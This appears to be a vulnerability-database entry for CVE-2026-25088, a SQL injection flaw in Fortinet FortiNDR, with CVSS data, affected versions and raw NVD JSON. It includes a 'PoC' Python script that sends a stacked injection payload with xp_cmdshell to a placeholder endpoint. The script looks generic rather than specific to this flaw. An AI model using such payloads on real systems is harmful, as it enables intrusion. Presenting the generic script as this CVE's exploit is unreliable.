Security Vulnerability Report
CVE-2026-25088 CVSS 5.4 MEDIUM

CVE-2026-25088

Published: 2026-05-12 18:16:39
Last Modified: 2026-05-12 18:57:02

Description

An improper neutralization of special elements used in an sql command ('sql injection') vulnerability in Fortinet FortiNDR 7.6.0 through 7.6.2, FortiNDR 7.4.0 through 7.4.9, FortiNDR 7.2 all versions, FortiNDR 7.1 all versions, FortiNDR 7.0 all versions may allow an authenticated attacker to execute unauthorized code or commands via specifically crafted HTTP requests.

CVSS Details

CVSS Score: 5.4
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

FortiNDR 7.6.0 - 7.6.2
FortiNDR 7.4.0 - 7.4.9
FortiNDR 7.2 (all versions)
FortiNDR 7.1 (all versions)
FortiNDR 7.0 (all versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# Target configuration
target_host = "https://<target-ip>"
vulnerable_endpoint = "/api/some_endpoint"
url = target_host + vulnerable_endpoint

# Attacker credentials (Low privilege required)
credentials = {
    "username": "attacker",
    "password": "password123"
}

# Create a session to handle authentication
session = requests.Session()
session.post(target_host + "/login", data=credentials)

# Malicious payload to exploit SQL Injection
# Example: Attempting to execute a command via stacking
payload = "1' OR 1=1; EXEC xp_cmdshell('dir')--"

# Inject payload into request parameters
params = {
    "id": payload
}

try:
    # Send the crafted HTTP request
    response = session.get(url, params=params, verify=False, timeout=10)

    # Analyze response
    if response.status_code == 200:
        print("[+] Request sent successfully.")
        print("[+] Response body:", response.text)
    else:
        print("[-] Exploit failed or endpoint returned error.")
except Exception as e:
    print(f"[-] An error occurred: {e}")
```

References

https://fortiguard.fortinet.com/psirt/FG-IR-26-134 (Fortinet PSIRT advisory, as listed in the record below)
Raw JSON Data

```json
{"cve": {"id": "CVE-2026-25088", "sourceIdentifier": "[email protected]", "published": "2026-05-12T18:16:39.327", "lastModified": "2026-05-12T18:57:02.307", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "An improper neutralization of special elements used in an sql command ('sql injection') vulnerability in Fortinet FortiNDR 7.6.0 through 7.6.2, FortiNDR 7.4.0 through 7.4.9, FortiNDR 7.2 all versions, FortiNDR 7.1 all versions, FortiNDR 7.0 all versions may allow an authenticated attacker to execute unauthorized code or commands via specifically crafted HTTP requests."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://fortiguard.fortinet.com/psirt/FG-IR-26-134", "source": "[email protected]"}]}}
```